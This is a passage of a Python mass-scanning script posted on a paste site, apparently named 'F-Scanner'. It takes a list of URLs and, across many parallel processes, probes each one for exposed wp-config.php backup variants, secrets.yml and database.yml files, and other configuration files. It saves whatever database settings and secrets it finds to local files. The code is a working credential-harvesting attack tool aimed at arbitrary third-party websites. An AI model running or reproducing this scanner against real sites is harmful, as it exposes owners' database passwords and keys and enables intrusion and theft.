'wordpress/wp-config.php.staging', 'wordpress/wp-config.php.swn', 'wordpress/wp-config.php.swo', 'wordpress/wp-config.php.swordpress/wp', 'wordpress/wp-config.php.tar', 'wordpress/wp-config.php.temp', 'wordpress/wp-config.php.tmp', 'wordpress/wp-config.php.txt', 'wordpress/wp-config.php.uk', 'wordpress/wp-config.php.us', 'wordpress/wp-config.php=', 'wordpress/wp-config.php~', 'wordpress/wp-config.php~~~', 'wordpress/wp-config.php1', 'wordpress/wp-config.phpa', 'wordpress/wp-config.phpb', 'wordpress/wp-config.phpbak', 'wordpress/wp-config.phpc', 'wordpress/wp-config.phpd', 'wordpress/wp-config.phpn', 'wordpress/wp-config.phpnew', 'wordpress/wp-config.phpold', 'wordpress/wp-config.phporiginal', 'wordpress/wp-config.phptmp', 'wordpress/wp-config.prod.php.txt', 'wordpress/wp-config.save', 'wordpress/wp-config.tar', 'wordpress/wp-config.temp', 'wordpress/wp-config.txt', 'wordpress/wp-config.zip', 'wordpress/wp-config~', 'wordpress/wp-configbak']
  190. for path in configphpPathlist:
  191. url_ = self.rebuild_url(path)
  192. try:
  193. resp = session.get(url_, timeout=10, verify=False).text
  194. if 'The base configuration for WordPress' in resp or 'WordPress database table prefix' in resp or 'table_prefix' in resp or 'wp-settings.php' in resp:
  195. print(self.url + ' -> FOUND WP CONFIG')
  196. self.saveTofile('php_config.txt', resp, url_)
  197. break
  198. else:
  199. if path == configphpPathlist[-1]:
  200. print(self.url + ' -> NOT FOUND WP CONFIG')
  201. except:
  202. pass
  203.  
  204. def config_yaml(self):
  205. configyamlPathlist = ['app/config.yml', 'app/config/parameters.yml', 'config/secrets.yml',
  206. 'secrets.yml', 'database.yml']
  207. for path in configyamlPathlist:
  208. url_ = self.rebuild_url(path)
  209. try:
  210. resp = session.get(url_, timeout=10, verify=False).text
  211. if re.search('database_host|database_name|db_name|db_host', resp, re.IGNORECASE):
  212. print(self.url + ' -> FOUND YAML CONFIG')
  213. self.saveTofile('yaml_config.txt', resp, url_)
  214. break
  215. else:
  216. if path == configyamlPathlist[-1]:
  217. print(self.url + ' -> NOT FOUND YAML CONFIG')
  218. except:
  219. pass
  220.  
  221. def start_(url, foldersave):
  222. if '://' not in url:
  223. url = 'http://' + url
  224. try:
  225. session.get(url, timeout=7, verify=False)
  226. main = Main(url, foldersave)
  227. main.phpinfo()
  228. main.config_json()
  229. main.env()
  230. main.config_php()
  231. main.aws()
  232. main.yii()
  233. main.debug()
  234. main.symfony()
  235. main.config_js()
  236. main.config_yaml()
  237. except:
  238. print(url + ' -> ERROR')
  239.  
  240.  
  241. def main_():
  242. cpu_count = mp.cpu_count()
  243. thrit = cpu_count * 5
  244. print('''F-Scanner v1.0
  245. CPU: %s
  246. Thread: %s
  247. ''' % (cpu_count, thrit))
  248. try:
  249. list_url = open(input('Url ? ')).read().splitlines()
  250. folder = input('Save Folder ? ')
  251. if folder == '':
  252. folder = 'Results'
  253. if not os.path.isdir(folder):
  254. os.makedirs(folder)
  255. except FileNotFoundError:
  256. print('File not found')
  257. sys.exit()
  258. pool = mp.Pool(thrit)
  259. pool.map_async(partial(start_, foldersave=folder), list_url)
  260. pool.close()
  261. pool.join()
  262. print('\nDone')
  263. sys.exit(input('Press Enter to exit...'))
  264.  
  265.  
  266. if __name__ == '__main__':
  267. main_()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!